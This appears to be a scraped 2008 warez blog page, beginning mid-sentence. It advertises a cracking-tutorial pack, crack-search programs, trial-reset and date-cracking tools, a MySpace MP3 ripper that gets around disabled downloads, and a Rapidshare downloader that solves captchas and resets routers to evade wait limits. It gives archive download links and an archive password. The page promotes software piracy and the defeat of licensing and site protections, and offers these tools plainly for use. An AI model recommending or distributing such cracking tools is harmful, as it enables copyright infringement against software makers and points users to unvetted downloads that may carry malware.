software, and bypass the many other security features designed to

limit your freedom.

Apply your newfound cracking knowledge by attempting to break

real software code. Each of our comprehensive examples includes

detailed solutions, with easy-to-follow procedure on exploiting

software vulnerability. No longer do you have to just read and

passively learn about cracking. Our methods actually allow you to

get your hands dirty with real-life working examples. Experience

the excitement of cracking windows authentication. Software

registration, and network protocols. Enjoy the thrill of creating

your own key generators.



INSTALLATION:

Unrar and burn with your software of choice.

Enjoy !

http://rapidshare.com/files/10536302/krak_pack.part1.rar.html
http://rapidshare.com/files/10525780/krak_pack.part2.rar.html

Crack Searching & Shareware Hacking All-In-One



a- Crack Searching Programms:



1- Craagle v1.91

2- CrackDownloader Plus v2.2 (released 10/07/2005)

3- Serials3k

4- Crack Searcher

5- Crack Buster v1.3

6- Galaxy search

7- Crack Wizard



b- Shareware Hacking Programs:



1- Never Expire v2.0

2- Trial Doctor v1.3.1

3- Trial Reset v2.5

4- MicroBest CrackLock v3.8.4

5- Date Cracker 2000

6- Date Facker 32

7- Date Hacking v1.2



c- AIO eBook bonus:



Beginner Olly Cracking Tutorials

[9 detailed step-by-step tutorials]



By: Gabri3l, Shub-Nigurrath, MaDMAn_H3rCuL3s / ARTeam



Beginner tutorial 1: Serial fishing

Beginner tutorial 2: Internal Keygen and Patching

Beginner tutorial 3: Unpacking and Patching

Beginner tutorial 4: unpacking and patching, a more complex case v.1.1

Beginner Tutorial 5: Inline Patching

Beginner Tutorial 6: Packers theory v1.1

Beginner Tutorial 7: Cracking using Memory BP's

Beginner Tutorial 8: Breakpoints Theory v1.2

Beginner Tutorial 9: Defeating Magic Byte Protection



Note:

- Despite the debate, shareware Hacking programs are useful and do work in a several situations ...

- Press tutorial number to read in your browser



http://rapidshare.com/files/124902189/CS_S.rar.html
Password:
GaryCallaghan

Friday, August 8, 2008

Myspace Mp3 Stealer



MySpaceMP3 Gopher is a stand-alone application which allows you to
download anartist's MP3 file from MySpace even if the downloading of
said song isdisabled.


DOWNLOAD

Tuesday, August 5, 2008

Cryptload Ultimate Rapidshare Downloader




Cryptload Ultimate Rapidshare Downloader
Rapidshare is one of the biggest file hosters on the web and has a remarkably confusing interface and system that confuses many users at the same time. This could have been designed to be this way on purpose to up-sell premium accounts to users who do not want to wait before they can download a file from Rapidshare.
Cryptload is a software that makes it easier to download files from Rapidshare. The biggest advantage of this tool is that it can detect and automatically enter captchas on the Rapidshare website. Besides that it supports a tool called Router control which can reset routers to force a new IP address which in turn makes the downloads immediately available again getting rid of the wait timer effectively.


Cryptload can be configured to react on Rapidshare links that are posted to the clipboard which are then automatically added to the download queue. A log informs the user of return messages from Rapidshare and the downloads are neatly sorted in the download manager window.

The software supports several other file hosters besides Rapidshare including Megaupload and Netload with the possibility to add more hosters using so called plugins which are also available on the Cryptload homepage.


DOWNLOAD